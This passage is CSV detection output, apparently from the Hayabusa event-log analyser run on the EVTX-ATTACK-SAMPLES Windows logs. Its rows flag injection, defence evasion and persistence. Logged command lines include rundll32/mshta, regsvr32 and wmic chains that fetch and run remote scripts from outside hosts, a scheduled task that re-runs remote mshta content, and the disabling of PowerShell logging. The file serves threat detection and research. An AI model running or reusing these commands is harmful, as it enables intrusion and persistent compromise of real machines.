Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.708 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.786 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.786 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.786 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.786 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:18.833 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Defense Evasion - Unmanaged PowerShell Detected | Image: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e\System.Management.Automation.ni.dll | Process: C:\Windows\System32\notepad.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2840 | PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00 | Hash: SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:18.833 +00:00,IEWIN7,7,medium,Exec,In-memory PowerShell,,rules/sigma/image_load/image_load_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:50:36.858 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Execution - jscript9 engine invoked via clsid | Cmd: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js | Process: C:\ProgramData\winpm.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13531 | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: 
SHA1=C537FF2520215555B6E7B1B71C237F73D960BBED,MD5=41B81EF73218EC0EA0EC74F1C4C0F7B1,SHA256=D1B611E6D672AFC5A3D0F443FD8E2618B7416EFE2DD36593E971BF2F027A9AE3,IMPHASH=BFA8DFA346E250F59C0E2F57DAEFD14D",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-18 17:50:36.889 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - rare script engine detected | Image: C:\Windows\System32\jscript9.dll | Process: C:\ProgramData\winpm.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=459A1C58B1B478B53734D0E053E8E14A12ACF427,MD5=FD5FFB00810EC3A9BE8D07EBE94CC034,SHA256=EEB182D598CE511C6509A0B94C17B04D9A4F451FCF99381E61B9DA9F224C510A,IMPHASH=E40AA27717F3033220E53410215609D0",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-18 17:51:14.254 +00:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x13531 | PID: 2600 | PGUID: 365ABB72-4612-5CE0-0000-00103D1E2600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-18 17:51:14.254 +00:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-18 17:51:14.254 +00:00,IEWIN7,1,high,Evas,Regsvr32 
Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 17:32:00.482 +00:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories | Cmd: attrib +h nbtscan.exe | Process: C:\Windows\System32\attrib.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x566cc | PID: 2728 | PGUID: DFAE8213-9310-5CE1-0000-0010EABA0A00 | Hash: SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-19 17:32:00.482 +00:00,DC1.insecurebank.local,1,low,Evas,Hiding Files with Attrib.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-19 18:05:07.719 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | SetValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 1348 | PGUID: 365ABB72-9AD3-5CE1-0000-0010F55C1800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx +2019-05-19 18:05:33.454 +00:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | DeleteValue: 
HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging | Process: C:\Windows\system32\reg.exe | PID: 860 | PGUID: 365ABB72-9AEB-5CE1-0000-0010F0B51800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx +2019-05-21 00:35:07.308 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | Process: C:\Users\IEUser\Downloads\com-hijack.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xc796 | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.308 +00:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.463 +00:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\demo.dll | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.474 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3944 | Tgt PGUID: 
365ABB72-47BB-5CE3-0000-001071AD3E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.474 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3176 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.474 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\test.bat | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.474 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c test.bat | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3944 | PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.474 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c pause | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3176 | PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 
00:35:07.518 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /c test.bat | LID: 0xc796 | PID: 3168 | PGUID: 365ABB72-47BB-5CE3-0000-001053AF3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.870 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3936 | PGUID: 365ABB72-47BB-5CE3-0000-001019C53E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:08.279 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2596 | PGUID: 365ABB72-47BC-5CE3-0000-00107DDD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:08.728 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3860 | PGUID: 
365ABB72-47BC-5CE3-0000-001044EE3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:08.728 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2236 | PGUID: 365ABB72-47BC-5CE3-0000-0010C6F03E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:10.161 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3920 | PGUID: 365ABB72-47BE-5CE3-0000-0010CF0C3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 
00:35:12.705 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3372 | PGUID: 365ABB72-47C0-5CE3-0000-00108D243F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 15:32:57.286 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xc796 | PID: 1532 | PGUID: 365ABB72-1A29-5CE4-0000-001054E32101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.286 +00:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta 
https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2920 | PGUID: 365ABB72-1A29-5CE4-0000-00107BE42101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.286 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.286 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.286 +00:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_sysmon/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.867 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.867 +00:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 
01,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.867 +00:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.867 +00:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation_sysmon/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:59.389 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49703 (IEWIN7..home) | Dst: 108.179.232.58:443 (gator4243.hostgator.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:59.769 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | LID: 0xc796 | PID: 3772 | PGUID: 365ABB72-1A2B-5CE4-0000-00102F502201",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:59.769 +00:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious 
Program,,rules/sigma/process_creation_sysmon/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:59.769 +00:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:59.809 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\MSOFFICE_ | Process: C:\Windows\system32\svchost.exe | PID: 856 | PGUID: 365ABB72-39CB-5CE3-0000-0010E0AC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:33:00.140 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49704 (IEWIN7..home) | Dst: 105.73.6.112:80 (aka112.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:33:01.141 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49705 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 04:02:11.307 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2 | 
LID: 0xf05d | PID: 2888 | PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-22 04:02:11.307 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Program Files\Internet Explorer\iexplore.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3156 | Src PGUID: 365ABB72-C9C1-5CE4-0000-00100B222E00 | Tgt PID: 2888 | Tgt PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-23 16:49:05.736 +00:00,IEWIN7,1,info,,Process Created,"Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:05.736 +00:00,IEWIN7,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation_sysmon/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:05.736 +00:00,IEWIN7,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation_sysmon/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:05.736 +00:00,IEWIN7,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation_sysmon/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:05.862 
